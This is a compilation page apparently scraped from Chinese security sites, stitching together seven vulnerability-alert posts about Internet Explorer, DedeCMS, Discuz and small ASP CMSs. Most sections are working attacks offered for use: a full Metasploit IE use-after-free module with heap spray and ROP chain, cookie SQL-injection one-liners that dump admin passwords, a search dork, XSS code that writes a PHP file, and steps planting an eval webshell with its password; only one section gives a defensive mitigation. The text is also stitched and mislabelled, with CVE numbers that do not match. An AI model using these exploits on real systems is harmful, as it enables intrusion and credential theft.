欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

高危漏洞CVE0027 EXP,影响IE所有版本漏洞预警

时间:2025-10-08 08:12:22 其他范文 收藏本文 下载本文

下面小编为大家带来高危漏洞CVE0027 EXP,影响IE所有版本漏洞预警,本文共7篇,希望能帮助大家!

篇1:高危漏洞CVE0027 EXP,影响IE所有版本漏洞预警

Microsoft Internet Explorer处理CPasteComma存在一个释放后使用错误,允许构建恶意WEB页,诱使用户解析,可以应用程序上下文执行任意代码,CVE编号CVE-2013-0027,影响版本如下:

Microsoft Internet Explorer 10

Microsoft Internet Explorer 9

Microsoft Internet Explorer 8

Microsoft Internet Explorer 7

Microsoft Internet Explorer 6 在Metasploit已经发布相应的利用脚本,如下:

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::RopDb

def initialize(info={})

super(update_info(info,

'Name'     =>“MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free”,

'Description'  =>%q{

This module exploits a use-after-free vulnerability in Microsoft Internet Explorer

where a CParaElement node is released but a reference is still kept

in CDoc. This memory is reused when a CDoc relayout is performed.

},

'License'    =>MSF_LICENSE,

'Author'    =>

[

'Scott Bell ' # Vulnerability discovery & Metasploit module

],

'References'  =>

[

[ 'CVE', '2013-0025' ],

[ 'MSB', 'MS13-009' ],

[ 'URL', 'security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]

],

'Payload'  =>

{

'BadChars'   =>“\\x00”,

'Space'     =>920,

'DisableNops'  =>true,

'PrependEncoder' =>“\\x81\\xc4\\x54\\xf2\\xff\\xff” # Stack adjustment # add esp, -3500

},

'DefaultOptions' =>

{

'InitialAutoRunScript' =>'migrate -f'

},

'Platform'  =>'win',

'Targets'  =>

[

[ 'Automatic', {} ],

[ 'IE 8 on Windows XP SP3', { 'Rop' =>:msvcrt, 'Offset' =>0x5f4 } ]

],

'Privileged'   =>false,

'DisclosureDate' =>“Feb 13 2013”,

'DefaultTarget' =>0))

register_options(

[

OptBool.new('OBFUSCATE', [false, 'Enable JavaScript. obfuscation', false])

], self.class)

end

def get_target(agent)

#If the user is already specified by the user, we'll just use that

return target if target.name != 'Automatic'

nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''

ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''

ie_name = “IE #{ie}”

case nt

when '5.1'

os_name = 'Windows XP SP3'

end

targets.each do |t|

if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))

print_status(“Target selected as: #{t.name}”)

return t

end

end

return nil

end

def heap_spray(my_target, p)

js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))

js_nops = Rex::Text.to_unescape(“\\x0c”*4, Rex::Arch.endian(target.arch))

js = %Q|

var heap_obj = new heapLib.ie(0x0);

var code = unescape(“#{js_code}”);

var nops = unescape(“#{js_nops}”);

while (nops.length < 0x80000) nops += nops;

var ffset = nops.substring(0, #{my_target['Offset']});

var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

while (shellcode.length < 0x40000) shellcode += shellcode;

var block = shellcode.substring(0, (0x80000-6)/2);

heap_obj.gc;

for (var i=1; i < 0x300; i++) {

heap_obj.alloc(block);

}

var verflow = nops.substring(0, 10);

|

js = heaplib(js, {:noobfu =>true})

if datastore['OBFUSCATE']

js = ::Rex::Exploitation::JSObfu.new(js)

js.obfuscate

end

return js

end

def get_payload(t, cli)

code = payload.encoded

# No rop. Just return the payload.

return code if t['Rop'].nil?

# ROP chain generated by mona.py - See corelan.be

case t['Rop']

when :msvcrt

print_status(“Using msvcrt ROP”)

rop_nops = [0x77c39f92].pack(“V”) * 11 # RETN

rop_payload = generate_rop_payload('msvcrt', “”, {'target'=>'xp'})

rop_payload << rop_nops

rop_payload << [0x77c364d5].pack(“V”) # POP EBP # RETN

rop_payload << [0x77c15ed5].pack(“V”) # XCHG EAX, ESP # RETN

rop_payload << [0x77c35459].pack(“V”) # PUSH ESP # RETN

rop_payload << [0x77c39f92].pack(“V”) # RETN

rop_payload << [0x0c0c0c8c].pack(“V”) # Shellcode offset

rop_payload << code

end

return rop_payload

end

def get_exploit(my_target, cli)

p = get_payload(my_target, cli)

js = heap_spray(my_target, p)

html = %Q|

|

return html

end

def on_request_uri(cli, request)

agent = request.headers['User-Agent']

uri = request.uri

print_status(“Requesting: #{uri}”)

my_target = get_target(agent)

# Avoid the attack if no suitable target found

if my_target.nil?

print_error(“Browser not supported, sending 404: #{agent}”)

send_not_found(cli)

return

end

html = get_exploit(my_target, cli)

html = html.gsub(/^\\t\\t/, '')

print_status “Sending HTML...”

send_response(cli, html, {'Content-Type'=>'text/html'})

end

endpastebin.com/raw.php?i=wKztJfTS

微软安全补丁: technet.microsoft.com/en-us/security/bulletin/ms13-009

篇2:简单文章管理系统 cookie注入漏洞通杀所有版本漏洞预警

简单文章管理系统采用一级分类,界面简洁,功能简单实用,删除文章后,文章相关图片也一并删除减

少垃圾文件的存在。

后台管理入口域名/admin 用户名和密码都是admin

后台模块:

信息管理: 发布信息 修改信息 查找信息 推荐信息

系统管理: 类别管理 用户管理 系统设置 数据库维护

漏洞文件:article.asp Check_SqlIn.asp 代码我就不作分析了。网上多的是,差不多的问题。

漏洞说明:过滤不严,导致可cookie注入。

好像有两个字段14和12。

exp:

javascript.:alert(document.cookie=“id=”+escape(“119 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin”));

javascript.:alert(document.cookie=“id=”+escape(“235 union select 1,2,3,user,5,password,7,8,9,10,11,12 from admin”));

利用方法我就不说了,网上很多,整天JJYY还是这点破事,

有图有真像:

拿shell方法:

暂时没有更好的办法,但是如果他的数据库是.asp .asa后缀的话,可在

www.xxx.com/data/!%article%!.asp

改变下成:www.xxx.com/data/%21%25article%25%21.asp

没对数据库访问进行处理。 ING~~~~~~~

用户管理--->增加管理员中 帐户写上一句话变型马。然后菜刀之类的连就可以了。

dork:

inurl:list.asp?classid=1 首页 上一页 下一页 尾页 页次:页 共 条记录 条记录/页 转到:

注意后面的字哦。。。^_^

From: www.0855.tv

By: Mr.DzY

篇3:启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警

by Mr.DzY

from www.0855.tv

由于网上开源的东西多了,版权就无从查起,这天姑且就这么称乎它吧。

具体版权无从查知,相似的内核太多。

源码下载:www.mycodes.net/25/4628.htm

:www.tb11.net/

官方演示:www.tb11.net/system/xitong/

www.tb11.net/system/xitong2/

www.tb11.net/system/xitong3/

直接上exploit:

javascript.:alert(document.cookie=“id=”+escape(“1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin”));

test:www.tb11.net/system/xitong/shownews.asp?id=210

测试关键字自己找,

篇4:IE 0day漏洞的消息:所有版本的IE都受影响

编外:用ie6的不用庆幸了(包括我)

tombkeeper的和谐Blog

微软更新了对这个漏洞的公告:

December 11, : Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds.

也就是说,IE5、IE6、IE7、IE8全部都受这个漏洞的影响,而不是我们原先认为的只有IE7受影响,所以,我推荐所有IE用户下载安装www.xfocus.net/tk/tkBHO.zip。相关说明见:hi.baidu.com/tombkeeper/blog/item/d48412e9f9d07b38b90e2d09.html。

另外,请大家注意并转告那些仍然存在误解的朋友:微软目前尚未提供该漏洞的补丁,安装刚刚发布的12月安全更新并不能消除该漏洞。

补充:感谢匿名网友的留言提醒。经过测试确认,阻拦对oledb32.dll的访问的确可以对该漏洞起到临时防护的作用。请在命令提示符中按照下面演示的样子输入命令完成设置:

C:\\命令提示符

Microsoft Windows [版本5.2.3790]

(C)版权所有1985- Microsoft Corp.

C:\\> cacls “%CommonProgramFiles%\\System\\Ole DB\\oledb32.dll” /E /P Everyone:N

处理的文件: C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll

C:\\>

注意,阻拦对oledb32.dll的访问可能导致IE访问某些网站不正常,还可能对其他一些软件造成影响,

如果希望恢复对oledb32.dll的访问,可以用下面这条命令:

C:\\命令提示符

Microsoft Windows [版本5.2.3790]

(C)版权所有1985-2003 Microsoft Corp.

C:\\> cacls “%CommonProgramFiles%\\System\\Ole DB\\oledb32.dll” /E /R Everyone

处理的文件: C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll

C:\\>

篇5:DEDECMS xss 0day 通杀所有版本漏洞预警

漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行,可getshell

目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。

条件有2个:

1.开启注册

2.开启投稿

注册会员—-发表文章

内容填写:

新建xss.css,内容:

body{

background-image:url(´javascript.:document.write(“”)´)

}

新建xss.js文件,内容:

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest;

if(request.overrideMimeType) {

request.overrideMimeType(´text/xml´);

}

} else if(window.ActiveXObject) {

var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

xmlhttp=request;

function getFolder( url ){

bj = url.split(´/´)

return obj[obj.length-2]

}

Url = top.location.href;

u = getFolder(oUrl);

add_admin();

function add_admin(){

var url= “/”+u+“/sys_sql_query.php”;

var params =“fmdo=edit&backurl=&activepath=/data&filename=haris.php&str=

篇6:DISCUZ所有版本COOKIE劫持方法+DEMO漏洞预警

DISCUZ和很多论坛都无法进行会话劫持,因为会话和IP绑定了,DISCUZ主要的会话认证机制如下:

/inlude/common.inc.php

//第136行 验证会话重要的一段就是从sessions表中查询SID,其中一个重要的条件就是$onlineip,如果$onlineip和sessions表中的IP信息无法对应,就不能继续建立sessions表中保存的会话,

――――――――――――――――――――――――――C

代码:

if($sid) {

if($discuz_uid) {

$query = $db->query(”SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, s.pageviews AS spageviews, s.lastolupdate, s.seccode, $membertablefields

FROM {$tablepre}sessions s, {$tablepre}members m

WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid'

AND m.password='$discuz_pw' AND m.secques='$discuz_secques'“);

//79行 $onlineip首先取自HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头

------------------------------------------------------------------------------

if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {

$onlineip = getenv('HTTP_CLIENT_IP');

} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {

$onlineip = getenv('HTTP_X_FORWARDED_FOR');

} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {

$onlineip = getenv('REMOTE_ADDR');

} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], ‘unknown’)) {

$onlineip = $_SERVER['REMOTE_ADDR'];

}

所以如果我们伪造HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头就可以绕过IP绑定,

篇7:dedecms注入漏洞 影响版本5.3 C 5.5Posted in php漏洞预警

摘自: 笔记

dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究,利用此漏洞进行违法活动者,后果自负。

假设域名是:www.abc.com攻击步骤如下:

1. 访问网址:

www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

可看见以下错误信息

注入成功

2. 访问 www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。

int(3) Error: Illegal double '1024e1024' value found during parsing

Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. 执行附件地址:dede.rar里的文件 test.html,注意 form. 中 action 的地址是

按确定后的看到第2步骤的信息表示文件木马上传成功,

木马网址:www.abc.com/data/a.php

密码:2006888

漏洞分析:

利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。

解决方案:

打开文件 include/dedesql.class.php

找到代码

@fwrite($fp, ‘<’.'?php’.”\\r\\n/*\\r\\n{$savemsg}\\r\\n*/\\r\\n?”.”>\\r\\n”);

替换代码

@fwrite($fp, ‘<’.'?php’.”\\r\\nexit;\\r\\n/*\\r\\n{$savemsg}\\r\\n*/\\r\\n?”.”>\\r\\n”);

清空 data/mysql_error_trace.php 文件内容

马克斯CMScookies注入漏洞漏洞预警

Apple QuickTime信息泄露漏洞漏洞预警

iShowMusic V1.2 写入shell漏洞漏洞预警

在线支付逻辑漏洞总结漏洞预警

elasticsearch 漏洞利用工具套装漏洞预警

渗透底层路由技术漏洞预警

微软高危补丁:Office网络组件在IE的远程控制漏洞

启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警

IE 0day漏洞 问题出自MS Works

一个CGI程序的漏洞挖掘漏洞预警

《高危漏洞CVE0027 EXP,影响IE所有版本漏洞预警(精选7篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

点击下载本文文档